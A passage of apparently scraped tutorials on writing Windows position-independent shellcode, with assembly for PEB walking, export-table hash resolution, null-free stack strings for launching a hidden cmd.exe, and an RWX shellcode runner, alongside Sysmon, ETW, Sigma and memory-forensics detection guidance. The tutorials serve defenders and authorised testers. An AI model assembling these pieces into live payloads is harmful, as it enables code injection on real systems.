  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

Related Tutorials

References

Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.


1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).


2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

  • It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
  • It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
  • It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).


3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

ArchitectureInstructionResult
x86MOV EAX, FS:[0x30]EAXTEB.ProcessEnvironmentBlock (PEB)
x64MOV RAX, GS:[0x60]RAXTEB.ProcessEnvironmentBlock (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

StructFieldx86 offsetx64 offset
_TEBProcessEnvironmentBlock+0x030+0x060
_PEBLdr+0x00C+0x018
_PEB_LDR_DATAInLoadOrderModuleList+0x00C+0x010
_PEB_LDR_DATAInMemoryOrderModuleList+0x014+0x020
_PEB_LDR_DATAInInitializationOrderModuleList+0x01C+0x030
_LDR_DATA_TABLE_ENTRYDllBase+0x018+0x030
_LDR_DATA_TABLE_ENTRYBaseDllName+0x02C+0x058

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field
Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.


5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].


Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime
The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.


7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.


8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; trailing NUL via zeroed qword
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' (little-endian, no embedded zero)
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" — first arg for WinExec

Eliminate accidental nulls in opcodes:

AvoidUse insteadReason
mov rax, 0 (48 C7 C0 00 00 00 00)xor rax, raxRemoves four NUL bytes
push 0 (6A 00)xor reg, reg; push reg6A 00 contains a NUL
Short jumps spanning NUL displacementsPad with nop or reorder codeAvoids NUL in the offset byte
mov al, 0x00xor al, alSame fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.


9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

  1. RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
  2. The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    lea   rcx, [rsp + 0x40]         ; pointer to "cmd.exe" (built earlier)
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.


10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE)memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.


11. Common Attacker Techniques

TechniqueDescription
PEB walkingResolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports
Export hash resolutionROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack stringsPush immediates to materialise "cmd.exe", "WinExec", etc., on the stack
Reflective loadingPIC stub maps a full DLL into memory and calls its DllMain (T1620)
Remote injectionVirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID
APC queuingQueueUserAPC to deliver shellcode into an alertable thread
Process hollowingSuspend a benign process, unmap its image, write PIC payload, resume
Module stompingOverwrite the .text of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event IDSignal
1Process creation (with command line) — anomalous parents (winword.execmd.exe)
7ImageLoad from user-writable paths into system processes
8CreateRemoteThread — primary remote-injection signal
10ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD
17/18Named pipe creation/connection (common C2 channel)
25ProcessTampering (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS
      - '0x1410'      # VM_READ|VM_WRITE|VM_OPERATION
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

MitigationEffect
ACG (ProcessDynamicCodePolicy)Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE)
DEP / NXHardware-enforced non-execute on data pages
CFGInvalidates indirect calls to non-registered targets
HVCIHypervisor-enforced kernel code integrity
ASR rulesBlock office/script children, untrusted USB execution, etc.
Restrict SeDebugPrivilegeLimits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations
Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

ToolDescriptionLink
WinDbgVerify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY)microsoft.com
NASMAssemble x86/x64 PIC payloads in Intel syntaxnasm.us
x64dbgDynamic analysis of shellcode in a loader harnessx64dbg.com
Ghidra / IDAStatic disassembly of extracted opcodesghidra-sre.org
Process HackerInspect process memory regions and protectionsprocesshacker.sf.io
pe-sieveHunts injected, hollowed, or stomped modulesgithub.com/hasherezade/pe-sieve
Volatility 3malfind, ldrmodules, vadinfo for memory-resident PICvolatilityfoundation.org
YARASignature ROR-13 loops, PEB-walk prologues, hash tablesvirustotal.github.io/yara
SilkETWSubscribe to THREATINT and Kernel-Process providersgithub.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Reflective Code LoadingT1620Volatility malfind / ldrmodules; THREATINT ETW
Process Injection (parent)T1055Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM
Process Injection: DLLT1055.001Sysmon EID 7 from unusual paths; pe-sieve
Process Injection: APCT1055.004Kernel-Process ETW thread events on alertable waits
Process Injection: HollowingT1055.012Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan
Obfuscated Files or InformationT1027YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting InterpreterT1059EID 4688 / Sysmon EID 1 with command-line auditing

Summary

  • Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
  • The PEB → LdrInMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
  • Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
  • Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
  • Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

Related Tutorials

References

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.


1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Itemx86x64
General-purpose registers8 × 32-bit (EAXEDI)16 × 64-bit (RAXR15)
Windows calling conventionstdcall / cdecl — all args on stackUnified fast-call — first 4 integer args in registers
TEB segment registerFS; PEB at fs:[0x30]GS; PEB at gs:[0x60]
Address width32-bit64-bit (48-bit canonical VA in practice)
call pushes4-byte return address8-byte return address
RIP-relative addressingNot availableAvailable; lea rax, [rip + offset] is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.


2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #Integer RegisterFloating-Point Register
1stRCXXMM0L
2ndRDXXMM1L
3rdR8XMM2L
4thR9XMM3L
5th+Stack (above shadow space)Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

ClassRegisters
VolatileRAX, RCX, RDX, R8, R9, R10, R11, XMM0XMM5
Non-volatileRBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6XMM15

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.


Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX.
The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

  • Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
  • It is owned by the caller. The callee may overwrite it without saving the previous contents.
  • The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
  • Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).
Layout immediately after call, before callee prologueOffset from RSP
Return address (pushed by call)[RSP + 0x00]
Shadow slot for RCX[RSP + 0x08]
Shadow slot for RDX[RSP + 0x10]
Shadow slot for R8[RSP + 0x18]
Shadow slot for R9[RSP + 0x20]
5th argument (if any)[RSP + 0x28]

Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.


Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention.
The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

  • 0x20 (32 bytes) for shadow space.
  • + 0x08 to undo the misalignment the preceding call introduced.
; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x28                  ; shadow + 8 to keep call-time alignment

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.


5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

  • RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
  • call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.
; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = address of next instruction
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).


6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

StepSourceFieldOffset (x64)
1GS segmentTEB
2TEBProcessEnvironmentBlock+0x060
3PEBLdrPEB_LDR_DATA+0x018
4PEB_LDR_DATAInMemoryOrderModuleList+0x020
5LDR_DATA_TABLE_ENTRY linkInMemoryOrderLinks.Flink+0x000
6LDR_DATA_TABLE_ENTRYDllBase (from InMemoryOrderLinks)+0x030

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x30]     ; DllBase relative to InMemoryOrderLinks (x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address.
Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

FieldOffset
e_lfanew (RVA of PE header)DllBase + 0x3C
Optional HeaderPE_header + 0x18
Export Directory RVA (PE32+)OptHeader + 0x70
AddressOfFunctionsExportDir + 0x1C
AddressOfNamesExportDir + 0x20
AddressOfNameOrdinalsExportDir + 0x24
; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx eax, byte [rsi]
    test  al, al
    jz    .check
    ror   edi, 13
    add   edi, eax
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).


8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

ProblemFix
mov rax, 0x000000007FFE1234 → nullsxor eax, eax then mov eax, 0x7FFE1234 (zero-extends)
64-bit literal in mov r9, imm64lea r9, [rel label] or build via shifts/ORs
push 0 → encodes 6A 00xor rcx, rcx ; push rcx
mov rcx, 0 → 7-byte null runxor ecx, ecx
; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.


9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x28                ; shadow space + alignment

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x30]        ; r15 = kernel32 base

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x28
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

